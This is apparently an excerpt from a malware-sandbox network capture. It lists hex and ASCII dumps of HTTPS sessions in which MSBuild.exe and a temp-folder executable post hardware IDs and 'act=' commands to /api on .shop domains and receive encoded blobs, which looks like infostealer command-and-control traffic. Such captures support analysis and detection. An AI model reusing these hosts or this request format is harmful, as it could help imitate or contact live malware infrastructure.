6a 72 4f 6c 68 46 6c 64 70 50 59 42 70 44 55 4d 51 4d 56 6c 73 5a 56 58 47 36 Data Ascii: k2ElxgcIs5O986ECutSPEeP2k0mUlwTpWgxN3YwM/XaHZX4cFBmjQCwjcpLuVk2CtGQH2IWM3btIXx2M3xxupAIhbgoHCCsB7mPykmsYDMJ2Z8bYjc0XO0hfHYzIX2Tv2f2ujJHD+RO986ECukXckfQlE16GhwTo2kzMXU2NPvRA5n1fVppiAmnnsBGq1o+CNuKAydYUF7hDFZ2M3xxupJN37h3RiDUTvW90UjrOlhFldpPYBpDUMQMVlsZVXG6
2024-02-20 23:22:38 UTC	1369	IN	Data Raw: 68 33 52 69 44 55 54 76 57 76 30 56 69 6d 46 56 39 76 6c 64 70 50 59 42 6f 65 41 65 45 4d 56 6e 59 7a 66 48 47 36 6b 68 62 79 6b 44 49 63 49 73 35 4f 39 38 36 45 43 4b 78 5a 63 46 2b 56 32 41 55 76 55 46 59 61 71 47 34 35 4d 6e 67 73 4f 76 33 65 44 35 6e 7a 66 31 68 6b 6a 77 79 6e 69 73 4a 41 71 46 67 39 43 64 53 63 54 57 77 33 4e 46 7a 74 49 58 78 32 4d 33 78 78 75 4e 63 58 33 61 41 79 48 6c 4b 42 41 71 36 44 77 56 6d 68 46 56 39 76 6c 64 70 50 59 42 6f 65 41 65 45 4d 56 6e 59 7a 66 48 47 36 6b 68 62 79 6b 44 49 63 49 73 35 4f 39 38 36 45 43 4b 78 5a 63 46 2b 56 32 41 6b 73 53 6c 63 66 70 47 67 77 4d 33 34 37 4f 66 6a 66 43 35 37 32 65 31 39 6a 68 41 47 34 67 73 78 42 6f 6c 49 38 41 39 44 59 51 30 30 77 48 6c 7a 74 49 58 78 32 4d 33 78 7a 2f 38 68 50 78 Data Ascii: h3RiDUTvWv0VimFV9vldpPYBoeAeEMVnYzfHG6khbykDIcIs5O986ECKxZcF+V2AUvUFYaqG45MngsOv3eD5nzf1hkjwynisJAqFg9CdScTWw3NFztIXx2M3xxuNcX3aAyHlKBAq6DwVmhFV9vldpPYBoeAeEMVnYzfHG6khbykDIcIs5O986ECKxZcF+V2AksSlcfpGgwM347OfjfC572e19jhAG4gsxBolI8A9DYQ00wHlztIXx2M3xz/8hPx
2024-02-20 23:22:38 UTC	1369	IN	Data Raw: 6c 6a 77 65 2f 67 73 39 61 36 78 74 66 62 35 58 61 54 32 41 61 48 6c 7a 74 49 7a 6b 73 4d 57 5a 78 75 50 6f 55 6e 50 56 38 48 45 36 48 47 72 4c 4f 35 30 61 67 55 6a 77 52 6c 2f 64 6c 59 42 6f 65 58 4f 30 68 49 58 6f 65 56 6e 47 36 6b 6b 33 66 75 6d 6b 78 43 4d 35 4f 39 38 36 45 43 75 6b 58 63 41 44 62 32 46 56 67 47 46 55 51 6f 32 41 35 50 48 6b 37 4d 2f 50 51 41 4a 66 32 64 30 78 71 67 41 61 6e 67 38 56 46 72 31 67 36 41 74 36 4b 43 43 74 65 48 46 44 41 43 33 78 32 4d 33 78 78 75 70 4a 4e 33 66 39 6f 48 6a 6a 4f 54 49 32 48 79 48 71 6f 54 6e 42 6f 76 39 70 50 59 42 6f 65 58 4c 41 74 55 56 77 7a 66 48 47 36 6b 6b 32 45 6c 78 67 63 49 73 35 4f 39 38 36 45 43 75 74 53 50 45 65 50 32 6b 30 68 58 31 38 66 70 57 6f 79 4f 33 59 36 49 66 4c 58 48 5a 7a 35 65 31 Data Ascii: ljwe/gs9a6xtfb5XaT2AaHlztIzksMWZxuPoUnPV8HE6HGrLO50agUjwRl/dlYBoeXO0hIXoeVnG6kk3fumkxCM5O986ECukXcADb2FVgGFUQo2A5PHk7M/PQAJf2d0xqgAang8VFr1g6At6KCCteHFDAC3x2M3xxupJN3f9oHjjOTI2HyHqoTnBov9pPYBoeXLAtUVwzfHG6kk2ElxgcIs5O986ECutSPEeP2k0hX18fpWoyO3Y6IfLXHZz5e1
2024-02-20 23:22:38 UTC	1369	IN	Data Raw: 39 64 53 45 43 49 68 43 4a 67 33 4d 32 47 4a 4b 47 68 35 63 37 53 46 38 4b 7a 39 52 57 37 71 53 54 64 2b 36 4d 6b 63 50 35 45 37 33 7a 6f 51 4b 36 52 64 79 52 39 43 55 54 58 6f 61 48 42 4f 6f 62 54 59 79 66 7a 67 68 39 4e 38 4a 6e 66 6c 36 55 32 79 48 43 37 75 48 77 45 32 6d 56 54 59 42 30 35 77 4a 4c 46 73 63 55 4d 41 4c 66 48 59 7a 66 48 47 36 6b 6b 33 64 2f 32 67 65 4f 4d 35 4d 6b 71 48 33 43 6f 68 43 4a 67 33 51 6c 42 73 70 57 56 38 49 6f 6e 4e 2b 57 78 6c 38 63 62 71 53 54 64 2f 6e 50 6a 45 49 7a 6b 37 33 7a 6f 51 4b 73 6a 70 59 52 5a 58 61 54 32 41 61 48 6c 7a 76 5a 44 4a 30 4b 58 78 7a 38 39 34 4b 6e 50 52 36 57 57 36 65 44 62 2b 41 78 30 2b 73 58 69 49 4d 78 5a 4d 46 49 56 5a 55 46 36 39 74 50 6a 56 38 50 6e 4f 32 76 32 66 66 75 6a 49 63 49 73 35 Data Ascii: 9dSECIhCJg3M2GJKGh5c7SF8Kz9RW7qSTd+6MkcP5E73zoQK6RdyR9CUTXoaHBOobTYyfzgh9N8Jnfl6U2yHC7uHwE2mVTYB05wJLFscUMALfHYzfHG6kk3d/2geOM5MkqH3CohCJg3QlBspWV8IonN+Wxl8cbqSTd/nPjEIzk73zoQKsjpYRZXaT2AaHlzvZDJ0KXxz894KnPR6WW6eDb+Ax0+sXiIMxZMFIVZUF69tPjV8PnO2v2ffujIcIs5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49714	104.21.33.54	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:22:39 UTC	293	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 14025 Host: isotrimorphicnongrasse.shop
2024-02-20 23:22:39 UTC	14025	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 38 30 42 39 35 41 32 39 36 42 36 46 35 35 35 32 42 41 43 33 46 43 35 33 32 42 46 43 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 70 61 6c 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6880B95A296B6F5552BAC3FC532BFCFF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--pal
2024-02-20 23:22:40 UTC	810	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gqkl8ajllnrmtmu9eeajgp1hmc; expires=Sat, 15-Jun-2024 17:09:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UzULrZIucefxcUokh42r%2F1q4RkVidgvu1zxdluijwAbGBrlJanHVsCNv7smh88yiE78HlPI8PQijS4QPZ1hSKm7pUaWUIsuUiuYzvpaEez1z6eCOWhjl6ibqoxSOcBsqZFJ5JuNtS35SrKqvSLw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a7e2bfa8c72c2-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:22:40 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 32 32 0d 0a Data Ascii: 11ok 191.96.227.222
2024-02-20 23:22:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49712	104.21.94.2	443	6260	C:\Users\user\AppData\Local\Temp\98EC.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:22:39 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: resergvearyinitiani.shop
2024-02-20 23:22:39 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-02-20 23:22:39 UTC	818	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3aap26mt8b4d0kr43snonj1k4i; expires=Sat, 15-Jun-2024 17:09:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eOyI0HIkuPlyt%2F%2BnC53wVpb2PO6O0JbH2YwYh%2FBtm%2FYtVwpQhWx8U9DZTNF5OSKzqEIaPyXNDCBriVXsNXoLEQe364C87%2BDsbgQ8uTTfsXrsH59ig2WD7u3e%2FNKlvffvhpf1eeV%2BgAOf5vE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a7e2cdd37437b-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:22:39 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-02-20 23:22:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49715	104.21.94.2	443	6260	C:\Users\user\AppData\Local\Temp\98EC.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:22:40 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 61 Host: resergvearyinitiani.shop
2024-02-20 23:22:40 UTC	61	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 61 6c 70 61 64 69 6e 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=GhJLkO--seevpalpadin&j=default
2024-02-20 23:22:40 UTC	814	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=47hloid4mll6vmeau4e0acnu8h; expires=Sat, 15-Jun-2024 17:09:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8Pcrgt3Vh51G4hYejxN7r0gQ6Rheb7cqIO9TJ7FUWShUpRjSVWEtWKAsaM0O5HkeyGQKFX46q%2Fu3cbYh8YuLyXszoht%2B2TRW0gdTk4lTPGdgJe8bTzs%2BJEKe84PqM%2BP3%2BbCLcVjoERtIMWo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a7e32986242d8-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:22:40 UTC	555	IN	Data Raw: 34 63 31 38 0d 0a 6c 57 44 6e 63 68 59 78 47 5a 53 68 56 73 2f 46 69 76 37 4b 70 37 53 4c 57 6a 46 45 30 4d 68 4d 67 6b 4c 73 56 31 4c 54 39 62 66 75 62 65 31 53 4e 68 45 35 74 74 64 30 39 65 57 2b 30 73 65 74 6c 4b 74 36 45 57 61 6a 72 57 36 34 59 70 67 6c 4a 37 62 5a 75 70 39 41 78 31 49 32 45 33 6a 77 67 32 7a 76 6f 2b 75 53 75 63 4b 59 68 6c 41 52 5a 50 44 6f 62 75 63 36 7a 6d 31 79 69 50 69 39 74 55 44 48 55 6a 59 52 59 70 6d 72 64 75 2f 6c 71 74 37 71 68 35 53 70 50 31 39 6d 36 75 68 75 35 79 69 4f 4e 6a 36 78 6c 4e 7a 36 45 49 73 52 66 6c 31 2b 2f 4d 51 31 71 36 54 6d 6b 36 2f 43 30 65 6f 77 58 79 32 39 6f 43 47 67 62 75 46 64 63 76 50 56 6c 37 56 41 78 31 49 30 56 47 4f 32 6d 33 62 74 69 4f 2b 4b 71 2b 72 56 2b 44 45 54 53 64 72 6f 62 4b 4a 69 7a Data Ascii: 4c18lWDnchYxGZShVs/Fiv7Kp7SLWjFE0MhMgkLsV1LT9bfube1SNhE5ttd09eW+0setlKt6EWajrW64YpglJ7bZup9Ax1I2E3jwg2zvo+uSucKYhlARZPDobuc6zm1yiPi9tUDHUjYRYpmrdu/lqt7qh5SpP19m6uhu5yiONj6xlNz6EIsRfl1+/MQ1q6Tmk6/C0eowXy29oCGgbuFdcvPVl7VAx1I0VGO2m3btiO+Kq+rV+DETSdrobKJiz
2024-02-20 23:22:40 UTC	1369	IN	Data Raw: 44 4f 79 6e 4e 72 30 43 6f 34 43 64 45 46 39 2b 38 59 6d 71 36 4c 6d 6c 71 76 58 33 4f 63 2b 55 43 2b 35 6f 79 76 6e 4a 4d 35 37 58 39 6e 56 6c 37 56 41 78 31 49 32 45 54 76 78 32 33 54 31 35 61 69 39 70 63 37 61 34 79 39 54 5a 74 33 43 62 4b 4a 69 7a 48 64 79 72 74 6d 36 6e 30 44 48 55 6a 59 52 4f 65 2b 73 58 4f 2f 6c 71 74 37 71 68 35 53 72 65 46 51 71 38 76 4a 73 6f 43 53 50 4d 54 47 31 6d 64 76 7a 44 6f 4d 65 65 56 78 39 2f 4d 4d 7a 70 36 2f 67 6e 61 58 4f 32 65 6b 39 58 69 4b 30 70 69 2f 6c 59 4d 42 61 57 50 50 56 6c 37 56 41 78 31 49 32 45 33 7a 75 67 32 7a 76 35 38 61 62 71 39 65 55 33 44 74 64 4b 4c 57 38 62 6f 39 49 7a 48 64 79 38 39 57 58 36 45 7a 71 65 44 59 52 4f 62 53 42 64 72 54 49 67 4e 37 71 68 35 53 72 65 68 46 6b 38 71 30 69 6f 48 6a 4d Data Ascii: DOynNr0Co4CdEF9+8Ymq6LmlqvX3Oc+UC+5oyvnJM57X9nVl7VAx1I2ETvx23T15ai9pc7a4y9TZt3CbKJizHdyrtm6n0DHUjYROe+sXO/lqt7qh5SreFQq8vJsoCSPMTG1mdvzDoMeeVx9/MMzp6/gnaXO2ek9XiK0pi/lYMBaWPPVl7VAx1I2E3zug2zv58abq9eU3DtdKLW8bo9IzHdy89WX6EzqeDYRObSBdrTIgN7qh5SrehFk8q0ioHjM
2024-02-20 23:22:40 UTC	1369	IN	Data Raw: 48 61 2b 67 37 46 58 68 73 37 4f 62 53 42 64 75 2f 6c 71 74 37 6f 77 73 36 70 59 42 46 6d 6d 4b 6b 36 34 79 72 4d 41 44 4f 2f 6d 64 4c 68 51 75 70 34 4e 68 45 35 74 49 46 32 73 75 6d 48 39 4f 71 48 6c 4b 74 36 45 54 2f 64 77 6d 79 69 59 73 78 33 63 76 50 56 6c 66 41 4f 78 55 67 32 45 33 62 33 79 7a 4b 2f 71 4f 57 66 70 73 76 5a 37 44 64 62 4a 72 4b 6e 4b 2b 51 72 68 54 59 39 74 59 58 66 39 77 71 41 45 58 35 5a 4f 37 69 73 58 4f 2f 6c 71 74 37 71 68 35 53 72 65 46 51 2b 38 76 4a 73 6f 42 47 5a 50 6e 4b 45 6c 4e 76 35 42 5a 4e 51 47 7a 73 35 74 49 46 32 37 2b 58 33 30 73 65 74 6c 4b 74 36 45 57 54 77 73 30 47 49 59 73 78 33 63 76 50 56 6c 37 56 43 67 68 77 30 43 7a 6d 32 7a 6a 79 6f 6f 75 65 64 6f 73 76 54 34 7a 52 62 4b 4c 47 34 49 65 51 67 67 6a 30 36 76 Data Ascii: Ha+g7FXhs7ObSBdu/lqt7ows6pYBFmmKk64yrMADO/mdLhQup4NhE5tIF2sumH9OqHlKt6ET/dwmyiYsx3cvPVlfAOxUg2E3b3yzK/qOWfpsvZ7DdbJrKnK+QrhTY9tYXf9wqAEX5ZO7isXO/lqt7qh5SreFQ+8vJsoBGZPnKElNv5BZNQGzs5tIF27+X30setlKt6EWTws0GIYsx3cvPVl7VCghw0Czm2zjyoouedosvT4zRbKLG4IeQggj06v
2024-02-20 23:22:40 UTC	1369	IN	Data Raw: 41 78 77 6b 62 4f 7a 6d 30 67 58 62 76 35 61 72 65 36 4d 4c 61 71 57 41 52 5a 72 47 75 4c 75 45 67 68 69 63 77 6f 35 50 57 38 51 79 4d 48 33 35 63 65 76 6a 4a 50 61 71 67 35 5a 71 6e 78 74 6e 6f 50 46 30 6e 38 75 52 42 69 47 4c 4d 64 33 4c 7a 31 5a 65 31 51 6f 49 49 4e 41 73 35 74 75 77 33 75 36 32 6f 38 38 43 48 6c 4b 74 36 45 57 53 74 35 45 47 49 59 73 78 33 63 76 50 56 7a 4a 68 71 78 31 49 32 45 54 6d 30 67 58 62 74 6f 4f 54 63 38 49 65 57 34 7a 52 58 4a 62 36 6a 49 75 30 68 69 6a 49 39 74 5a 66 54 38 51 65 45 47 33 78 66 64 50 7a 50 4d 4b 47 75 37 70 43 72 78 74 43 70 64 6a 78 4f 38 4f 68 73 6f 6d 4c 4d 64 33 4c 78 6b 4d 32 33 57 73 64 51 56 56 35 77 2b 73 4d 33 76 4b 43 6f 38 38 43 48 6c 4b 74 36 45 57 53 74 35 45 47 49 59 73 78 33 63 76 50 56 7a 4a Data Ascii: AxwkbOzm0gXbv5are6MLaqWARZrGuLuEghicwo5PW8QyMH35cevjJPaqg5ZqnxtnoPF0n8uRBiGLMd3Lz1Ze1QoIINAs5tuw3u62o88CHlKt6EWSt5EGIYsx3cvPVzJhqx1I2ETm0gXbtoOTc8IeW4zRXJb6jIu0hijI9tZfT8QeEG3xfdPzPMKGu7pCrxtCpdjxO8OhsomLMd3LxkM23WsdQVV5w+sM3vKCo88CHlKt6EWSt5EGIYsx3cvPVzJ
2024-02-20 23:22:40 UTC	1369	IN	Data Raw: 4e 6b 77 31 6d 61 74 32 37 2b 57 71 33 75 72 63 75 59 46 36 45 57 54 77 36 47 79 69 59 73 34 79 50 50 48 50 6c 37 63 4f 6a 42 5a 79 56 6e 66 33 78 54 79 6f 72 2b 79 64 72 73 50 56 35 6a 78 57 4a 37 32 75 49 75 34 71 6a 7a 51 38 75 70 6a 65 38 6b 4c 4c 66 78 77 52 4f 62 53 42 64 75 2f 6c 71 74 79 76 33 5a 61 78 65 68 4d 58 73 62 77 35 38 43 7a 4f 57 6c 6a 7a 31 5a 65 31 51 4d 63 50 4f 6a 77 54 74 49 46 32 37 2b 57 71 68 63 65 74 6c 4b 74 36 45 57 54 77 36 47 79 67 4a 34 4a 31 61 50 50 58 31 4f 55 49 6a 78 35 78 58 48 37 31 7a 44 4f 67 6f 65 53 57 6f 63 33 51 35 6a 46 42 4a 62 36 6b 4b 65 34 73 67 44 67 36 73 70 71 56 75 57 33 74 55 6a 59 52 4f 62 53 42 64 75 2f 6e 37 34 54 6f 6e 5a 53 70 46 46 51 72 6e 4b 45 69 35 32 44 68 58 58 4c 7a 31 5a 65 31 51 4a 70 Data Ascii: Nkw1mat27+Wq3urcuYF6EWTw6GyiYs4yPPHPl7cOjBZyVnf3xTyor+ydrsPV5jxWJ72uIu4qjzQ8upje8kLLfxwRObSBdu/lqtyv3ZaxehMXsbw58CzOWljz1Ze1QMcPOjwTtIF27+WqhcetlKt6EWTw6GygJ4J1aPPX1OUIjx5xXH71zDOgoeSWoc3Q5jFBJb6kKe4sgDg6spqVuW3tUjYRObSBdu/n74TonZSpFFQrnKEi52DhXXLz1Ze1QJp
2024-02-20 23:22:40 UTC	1369	IN	Data Raw: 62 54 61 57 38 58 6c 71 74 37 71 68 35 53 72 65 68 4d 68 76 75 70 32 6f 6d 43 4b 50 7a 43 38 6e 64 37 34 41 59 49 65 64 46 35 78 35 4d 73 30 72 61 6e 75 6e 61 54 41 31 2b 55 37 51 53 71 30 70 79 6a 6f 4d 73 35 37 58 39 6e 56 6c 37 56 41 78 31 49 32 45 54 76 78 32 33 54 31 35 61 69 38 6f 38 6e 56 35 54 6c 55 45 37 47 6b 49 4f 63 32 7a 6c 70 59 38 39 57 58 74 55 44 48 44 7a 6f 34 46 4a 36 6f 64 75 2b 2b 68 2f 54 71 68 35 53 72 65 68 46 6b 38 4f 6f 70 37 47 44 57 64 33 43 38 6d 39 2f 36 42 34 45 59 63 31 42 36 2b 73 63 35 6f 4b 50 68 6d 4b 33 58 78 4f 38 32 55 79 6d 38 70 53 4c 79 4c 6f 73 31 50 50 48 5a 75 70 39 41 78 31 49 32 45 54 6d 30 67 58 53 71 76 36 6a 45 36 6f 58 6e 2f 6a 67 54 53 64 72 6f 62 4b 4a 69 7a 48 63 76 2f 2f 79 36 6e 32 33 74 65 7a 59 52 Data Ascii: bTaW8Xlqt7qh5SrehMhvup2omCKPzC8nd74AYIedF5x5Ms0ranunaTA1+U7QSq0pyjoMs57X9nVl7VAx1I2ETvx23T15ai8o8nV5TlUE7GkIOc2zlpY89WXtUDHDzo4FJ6odu++h/Tqh5SrehFk8Oop7GDWd3C8m9/6B4EYc1B6+sc5oKPhmK3XxO82Uym8pSLyLos1PPHZup9Ax1I2ETm0gXSqv6jE6oXn/jgTSdrobKJizHcv//y6n23tezYR
2024-02-20 23:22:40 UTC	1369	IN	Data Raw: 53 71 76 36 6a 45 36 6f 58 31 2f 69 68 65 5a 74 33 43 62 4b 4a 69 7a 48 64 79 72 74 6d 36 6e 30 44 48 55 6a 59 52 4f 65 2b 73 58 4f 2f 6c 71 74 37 71 68 35 53 72 65 46 51 71 38 76 4a 73 6f 43 69 44 50 54 71 31 6b 4e 6a 77 42 49 77 43 66 56 5a 31 39 73 63 2f 6f 71 48 73 6e 36 6a 58 30 4f 30 77 55 43 75 2f 70 43 33 6b 59 4d 42 61 57 50 50 56 6c 37 56 41 78 31 49 32 45 33 7a 75 67 32 7a 76 35 39 71 52 70 74 37 5a 37 69 6c 5a 5a 74 33 43 62 4b 4a 69 7a 48 64 79 72 74 6d 36 6e 30 44 48 55 6a 59 52 4f 65 2b 73 58 4f 2f 6c 71 74 37 71 68 35 53 72 65 46 51 71 38 76 4a 73 6f 43 53 41 4a 7a 75 77 6e 4e 37 35 42 59 6f 56 66 6c 4e 30 38 73 41 36 70 71 62 72 6c 4b 58 49 32 4f 4d 78 57 69 47 2b 72 69 6d 67 62 75 46 64 63 76 50 56 6c 37 56 41 78 31 49 30 56 47 4f 32 6d Data Ascii: Sqv6jE6oX1/iheZt3CbKJizHdyrtm6n0DHUjYROe+sXO/lqt7qh5SreFQq8vJsoCiDPTq1kNjwBIwCfVZ19sc/oqHsn6jX0O0wUCu/pC3kYMBaWPPVl7VAx1I2E3zug2zv59qRpt7Z7ilZZt3CbKJizHdyrtm6n0DHUjYROe+sXO/lqt7qh5SreFQq8vJsoCSAJzuwnN75BYoVflN08sA6pqbrlKXI2OMxWiG+rimgbuFdcvPVl7VAx1I0VGO2m
2024-02-20 23:22:40 UTC	1369	IN	Data Raw: 74 6e 36 50 50 32 4f 41 71 45 32 6a 64 77 6d 79 69 59 73 78 33 63 76 50 56 6c 66 41 61 78 55 67 32 45 31 48 74 77 6a 6d 68 35 63 61 58 76 73 4b 55 79 44 5a 59 49 62 36 38 62 6f 39 49 7a 48 64 79 38 39 57 58 36 45 7a 71 65 44 59 52 4f 62 53 42 64 72 54 49 67 4e 37 71 68 35 53 72 65 68 46 6b 38 71 30 69 6f 48 6a 4d 64 54 6d 2f 6d 39 62 77 43 6f 30 56 64 46 68 37 2b 63 6b 36 71 72 58 69 6b 4b 4c 58 32 65 6f 31 56 79 75 34 72 79 66 79 4a 59 63 7a 63 50 2f 34 76 62 56 41 78 31 49 32 45 54 6d 30 67 7a 4f 31 35 37 44 65 36 50 33 64 35 77 70 51 50 66 4c 46 52 71 4a 69 7a 48 64 79 38 34 69 62 6d 47 72 48 55 6a 59 52 4f 62 54 61 57 38 58 6c 71 74 37 71 68 35 53 72 65 68 4d 68 76 75 70 32 6f 6d 43 4e 4d 6a 4f 77 6e 64 7a 37 44 59 49 55 5a 6c 6c 38 35 4d 49 31 70 71 Data Ascii: tn6PP2OAqE2jdwmyiYsx3cvPVlfAaxUg2E1Htwjmh5caXvsKUyDZYIb68bo9IzHdy89WX6EzqeDYRObSBdrTIgN7qh5SrehFk8q0ioHjMdTm/m9bwCo0VdFh7+ck6qrXikKLX2eo1Vyu4ryfyJYczcP/4vbVAx1I2ETm0gzO157De6P3d5wpQPfLFRqJizHdy84ibmGrHUjYRObTaW8Xlqt7qh5SrehMhvup2omCNMjOwndz7DYIUZll85MI1pq
2024-02-20 23:22:40 UTC	1369	IN	Data Raw: 68 59 36 72 65 48 41 78 70 4b 41 31 6f 45 2f 6d 64 33 4c 7a 31 5a 65 31 48 63 74 2f 48 42 45 35 74 49 46 32 37 37 36 48 39 4f 71 48 6c 4b 74 36 45 57 54 77 36 69 6e 73 59 4e 5a 33 63 4c 79 51 32 2f 38 45 69 78 5a 6d 58 33 54 77 77 7a 57 6e 71 75 53 58 72 38 76 64 37 7a 31 65 4a 72 53 73 4b 75 51 6b 67 44 5a 77 2f 2f 69 39 74 55 44 48 55 6a 59 52 4f 62 53 44 4d 37 58 6e 73 4e 37 6f 34 76 76 59 65 6e 41 78 70 4b 41 70 37 44 61 46 4e 44 4f 6e 6d 73 57 33 62 65 31 53 4e 68 45 35 74 49 45 72 34 38 69 41 33 75 71 48 6c 4b 74 36 53 6b 6e 61 36 47 79 69 59 73 78 33 63 76 50 58 30 76 74 43 33 56 49 30 57 48 58 7a 77 6a 69 6e 6f 4f 61 4f 71 63 2f 61 36 44 39 55 4c 61 43 68 50 4f 73 6f 6a 54 73 34 75 4a 66 62 39 77 4f 49 45 44 51 64 46 4a 36 42 64 75 2f 6c 71 74 37 Data Ascii: hY6reHAxpKA1oE/md3Lz1Ze1Hct/HBE5tIF2776H9OqHlKt6EWTw6insYNZ3cLyQ2/8EixZmX3TwwzWnquSXr8vd7z1eJrSsKuQkgDZw//i9tUDHUjYRObSDM7XnsN7o4vvYenAxpKAp7DaFNDOnmsW3be1SNhE5tIEr48iA3uqHlKt6Skna6GyiYsx3cvPX0vtC3VI0WHXzwjinoOaOqc/a6D9ULaChPOsojTs4uJfb9wOIEDQdFJ6Bdu/lqt7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49717	104.21.33.54	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:22:40 UTC	293	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 16255 Host: isotrimorphicnongrasse.shop
